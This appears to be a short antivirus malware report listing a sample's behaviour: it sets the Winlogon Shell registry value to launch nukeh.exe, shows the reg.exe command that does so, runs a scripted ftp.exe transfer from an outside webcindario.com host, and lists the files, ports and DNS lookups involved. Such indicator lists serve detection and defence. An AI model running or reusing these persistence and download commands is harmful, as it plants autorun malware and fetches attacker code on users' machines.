Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe <SYSTEM32>\nukeh.exe'
- '<SYSTEM32>\ftp.exe' -s:%WINDIR%\transfer.txt ftp.webcindario.com
- '<SYSTEM32>\reg.exe' add hklm\software\microsoft\windows" "NT\currentversion\winlogon /v Shell /t REG_SZ /d explorer.exe" "<SYSTEM32>\nukeh.exe /f
- '%WINDIR%\explorer.exe' <Текущая директория><Имя вируса>
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\fuck[1].htm
- %WINDIR%\transfer.txt
- <SYSTEM32>\nukeh.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\fuck[1].htm
- 'localhost':1039
- 'ft#.##bcindario.com':21
- 'ce#######orelia.webcindario.com':80
- ce#######orelia.webcindario.com/fuck.htm
- DNS ASK ft#.##bcindario.com
- DNS ASK ce#######orelia.webcindario.com